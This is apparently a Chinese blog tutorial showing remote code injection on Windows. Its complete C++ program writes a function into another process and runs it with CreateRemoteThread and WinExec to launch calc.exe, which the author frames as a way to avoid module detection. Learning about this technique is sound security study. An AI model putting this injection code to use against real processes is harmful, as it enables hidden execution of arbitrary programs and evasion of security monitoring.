代码注入之启动计算器

于 2024-07-26 11:24:24 发布
阅读量232 收藏 4
点赞数 4
分类专栏: 远程线程 文章标签: c++ 安全 c语言 windows 汇编
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51681331/article/details/140710595
版权

控制目标进程加载自己的dll文件很容易被模块检测的手段察觉,因此我们可以向目标进程注入一段代码而非一个模块来规避检测手段

1 注入代码编写原则

(1)不能有全局变量
(2)不能使用常量字符串
(3)不能使用系统调用
(4)不能嵌套调用其他函数

当你使用以上方法编写函数,进入反汇编后,可以看到其访问地址是固定的,我们无法将这种固定地址的机器码的注入到其他进程中

2 传递参数和函数

只要遵守了上面4条编写原则,我们可以将参数和函数分别利用Windows提供的API写入到目标进程中,然后执行,这种方法不会增加模块
在这里插入图片描述

3 实验

首先编写注入代码:

#include <Windows.h>

typedef struct ParameterBlock
{
	DWORD LoadExeFunAddr;
	LPCSTR lpCmdLine;
	UINT uCmdShow;
}ParameterBlock, *PParameterBlock;

typedef HANDLE(WINAPI* LoadExe)(
	LPCSTR lpCmdLine,
	UINT uCmdShow
	);

DWORD WINAPI ThreadProc(LPVOID lParam) {
	PParameterBlock pb = (PParameterBlock)lParam;
	LoadExe le = (LoadExe)pb->LoadExeFunAddr;
	le(pb->lpCmdLine, pb->uCmdShow);
	return 0;
}

BOOL LoadParamAndFun(DWORD PID, char* ExeName) {

	ParameterBlock pb;
	DWORD FunSize = 0x400;

	//1.获得进程句柄
	HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);

	//2.分配参数、函数、exe名
	LPVOID ParamBlockAddr = VirtualAllocEx(hProc, NULL, sizeof(pb), MEM_COMMIT, PAGE_READWRITE);
	LPVOID NewThreadAddr = VirtualAllocEx(hProc, NULL, FunSize, MEM_COMMIT, PAGE_READWRITE);
	LPVOID ExeNameAddr = VirtualAllocEx(hProc, NULL, strlen(ExeName) + 1, MEM_COMMIT, PAGE_READWRITE);

	//3.对结构体赋值
	pb.uCmdShow = SW_SHOWNORMAL;

	//4.获得WinExec的地址
	HMODULE hMoudle = LoadLibrary("kernel32.dll");
	pb.LoadExeFunAddr = (DWORD)GetProcAddress(hMoudle, "WinExec");
	FreeLibrary(hMoudle);

	//5.初始化exe名
	pb.lpCmdLine = (LPCSTR)ExeNameAddr;

	//6.修改线程函数的起始位置
	DWORD FunAddr = (DWORD)ThreadProc;
	if (*(BYTE*)FunAddr == 0xE9) {
		FunAddr = FunAddr + 5 + *(DWORD*)(FunAddr + 1);
	}
	
	//7.传输结构体、参数和函数
	WriteProcessMemory(hProc, ParamBlockAddr, &pb, sizeof(pb), 0);
	WriteProcessMemory(hProc, NewThreadAddr, (LPVOID)FunAddr, FunSize, 0);
	WriteProcessMemory(hProc, ExeNameAddr, ExeName, strlen(ExeName) + 1, 0);
	
	//8.创建远程线程
	HANDLE pThread = CreateRemoteThread(hProc, NULL, 0, (LPTHREAD_START_ROUTINE)NewThreadAddr, ParamBlockAddr, 0, NULL);

	CloseHandle(hProc);
	
	return TRUE;
}

int main() {
	LoadParamAndFun(3752, "E:\\Windows\\system32\\calc.exe");
	return 0;
}

这里使用了Windows提供的API,即WinExec函数,该函数可以运行一个exe程序,相关参数含义可查看微软文档

UINT WinExec(
  		[in] LPCSTR lpCmdLine,
  		[in] UINT   uCmdShow
);

之后启动一个notepad程序,并查看其PID
在这里插入图片描述
将PID和计算器的地址填入程序
在这里插入图片描述
编译运行,计算器运行,实验成功
在这里插入图片描述

4 代码解释

这一部分主要解释一下注释6,即为什么要修改传入函数的地址,我们打开反汇编就可以很容易看出
在这里插入图片描述
我们发现函数开始地址并不是函数真正的地址,而是经过了一次跳转,上图中0B81840才是函数真正的地址。所以要有一次函数地址转换,才能把函数真正的内容复制到目标进程内存中
在这里插入图片描述

5 踩坑和疑问

1、该程序在物理机Win10环境下会直接导致被注入进程崩溃,而在虚拟机xp环境下可以正常运行
2、在开始写代码时我没有删除项目自动生成的 #include <iostream>,然而经过实验发现保留这一行运行会导致被注入的进程崩溃,我并不知道原因
3、看一下以下代码,我并没有把ParameterBlock和LoadExe传送到被注入的进程,那么被注入的进程是如何知道这些结构的呢?
在这里插入图片描述

阿巴阿巴嘻嘻
关注
  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Android 笔记:2015,android简易计算器代码
m0_65145113的博客
12-28 158
onRestart()方法则是只在activity从stopped状态恢复时才会被调用,因此我们可以使用它来执行一些特殊的恢复(restoration)工作,请注意之前是被stopped而不是destrory。 使用onRestart()来恢复activity状态是不太常见的,因此对于这个方法如何使用没有任何的guidelines。然而,因为onStop()方法应该做清除所有activity资源的操作,我们需要在重启activtiy时重新实例化那些被清除的资源,同样, 我们也需要在activ...
java网络计算器
12-31
要运行这个网络计算器,首先需要在服务器上启动服务端程序,然后在客户端机器上启动客户端。由于是本地测试,这里使用的IP地址是127.0.0.1,意味着客户端和服务端都在同一台机器上。在实际部署中,服务端可能需要...
利用Shellcode注入PE文件加载计算器
威化饼的一隅
04-16 2957
文章目录简介C语言版shellcode汇编版shellcodeshellcode跳转到原入口地址代码编写思路源代码 简介 采用C语言查看和修改一些PE文件的关键结构,结合shellcode,完成功能: 先用C语言编写通过LoadLibrary()和GetProcAddress()调用msvcrt.dll中的system()函数来弹出计算器代码。在OllyDbg中打开该程序,查看对应的汇编代码和...
Java代码审计之SpEL表达式注入漏洞分析
道阻且长,行则将至。
12-07 644
表达式注入是 Java 安全中一类常见的能够注入命令并形成 RCE 的漏洞,而常见的表达式注入方式有 EL 表达式注入、SpEL 表达式注入和 OGNL 表达式注入等。本文将通过调试分析 CVE-2022-22963 漏洞来入门学习 SpEL 表达式注入漏洞的原理。
log4j代码注入漏洞复现
AnNanDu的博客
12-16 3451
1.简介 前些天log4j官方宣布的log4j的漏洞闹得沸沸扬扬,各个公司加班升级修复,我们也在周末要求验证版本保证不受影响,既然知道了漏洞,我们就复现一下,比如让被注入文件的电脑关个机 2.工具准备 https://download.csdn.net/download/AnNanDu/64752930https://download.csdn.net/download/AnNanDu/64752930 里面包含2份源代码,两个工具类 log4j-exp:执行被注入代码的客户端服务 web-go
C++ 远程代码注入
weixin_30724853的博客
07-27 879
超级=_=,直接附上注入程序以及dll的代码。 dll 代码很简单只是弹窗,可以根据需要扩充。 注入程序由于是练手,只是随便写了打开计算器的远程注入。 从注入到卸载都包含,在程序执行完毕后扫尾巴 1 // InjectExample.cpp : 定义控制台应用程序的入口点。 2 3 4 #include "stdafx.h" 5 6 int...
Windows 多功能计算器
暗诺星刻的博客
01-19 2505
Windows 多功能计算器版本 M.3.1 运行效果图基本信息开发环境编程语言技术内幕架构模式设计模式模块介绍包名介绍测试核心算法操作数运算算法表达式检查的算法静态检查与动态检查算法单个字符语法检查的算法【静态检查算法】表达式计算的算法【动态检查算法】显示计算过程的算法通信算法独出心裁的设计将 Map 当做 Redis 数据库来使用懒执行JavaFX 与 Spring 适配使用 URL 来方便地进行各 UI 组件的之间的交互旧算法操作数运算算法(旧版本 M.1.1)显示计算过程的算法(旧版本 M.1.2)
利用CreateRemoteThread 实现远程代码注入的例子!!
jangdong的专栏
07-05 2081
#include "stdafx.h"#include &lt;windows.h&gt;#include &lt;stdlib.h&gt;#include &lt;stdio.h&gt;void CheckError ( int, int, char *); //出错处理函数PDWORD pdwThreadId; HANDLE hRemoteThread, hRemoteProcess;DWOR...
PE格式文件的代码注入
M-先生
10-07 5234
PE格式文件的代码注入       本文演示了在不需要重新编译源代码的情况下,怎样向Windows PE(Portable Executable)格式的文件(包括EXE、DLL、OCX)中注入自己的代码。   程序如图:            前言        或许,你想了解一个病毒程序是怎样把自身注入到一个正常的PE文件中的,又或者是
Java代码审计之SpEL表达式注入漏洞分析_spel 代码审计
2301_82257317的博客
04-29 969
);//表达式求值//创建解析器//传入并解析需要评估的表达式’”);//执行表达式,然后获取值// 映射到方法上,最终URL为localhost:8081/spel1,此处通常用 @GetMapping(“/spel1”) 表明GET请求方式的映射1、安装docker:2、安装docker-compose:3、启动docker后台服务:4、将当前用户加入docker组。
基于C#的计算器小程序
09-21
计算器项目中,工厂模式可以帮助我们降低不同运算符类之间的耦合度,使得代码更加模块化,更容易维护和扩展。如果需要添加新的运算功能,只需创建一个新的运算符类并让工厂负责生成即可,无需修改现有代码。 ...
CalculatorAngularJS:简单的计算器
06-30
最后,使用本地服务器(如http-server或live-server)启动服务,访问指定URL即可在浏览器中看到计算器应用。 **六、学习资源** 学习AngularJS和构建CalculatorAngularJS,你可以参考官方文档、在线教程以及社区资源...
简单工厂模式(计算器
07-11
总的来说,"简单工厂模式(计算器)"是一个很好的示例,用于展示如何在实际编程中运用设计模式来提高代码的可读性和可维护性。通过学习这个案例,我们可以更好地理解简单工厂模式的工作原理,以及如何在C#项目中有效...
Spring与OSGI整合 计算器例子(转) +附整合代码和spring-osgi核心jar
03-21
标题中的“Spring与OSGI整合 计算器例子(转)”指的是将Spring框架与OSGI(Open Services Gateway Initiative)模块化系统相结合,通过一个计算器应用的例子来阐述整合过程。OSGI是一种Java平台上的动态模块系统,它...
【刷题汇总 -- 爱丽丝的人偶、集合、最长回文子序列】
最新发布
m0_69455439的博客
07-23 683
今日刷题汇总day021 -- 爱丽丝的人偶、集合、最长回文子序列
C++笔试强训7
m0_74189279的博客
07-21 968
这意味着编译器会尝试将函数的代码直接插入到每个调用该函数的地方,而不是像通常那样进行函数调用(即,生成调用指令,跳转到函数代码,执行函数体,然后返回)。友元函数是在类外部定义的普通函数,它只能通过传入的参数(如果有的话)来访问类的成员,或者通过类的对象显式地访问(如果该函数设计为接受类的对象作为参数)。函数参数默认值又叫缺省参数,缺省参数必须从右向左开始缺省,必须连续给定缺省值,也就是说,从左到右,一旦遇到一个参数是缺省的,那么之后的参数也必须都是缺省的。指针是类成员函数特有的,用于指向调用该函数的对象。
商品信息管理系统(C语言)
zeyeqianli的博客
07-22 319
该案例使用了C语言中最具特色的结构体,将每个商品的所有信息存在结构体中,并且定义一个结构体类型的数组保存所有商品的信息,并且按照模块化的编程思想,将要实现的每个功能编写成独立的函数,这样即方便阅读同时也方便差错修改。该系统的主要功能如下:(1) 登录系统。(2) 创建商品信息。(3) 打印商品信息。(4) 查询商品信息。(5) 修改商品信息。(6) 删除商品信息。(7) 商品价格排名显示。(8) 退出系统。
C++笔记3:基类指针delete子类对象的内存泄漏问题
subtitle_的博客
07-21 253
C++笔记3:基类指针delete子类对象的内存泄漏问题
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值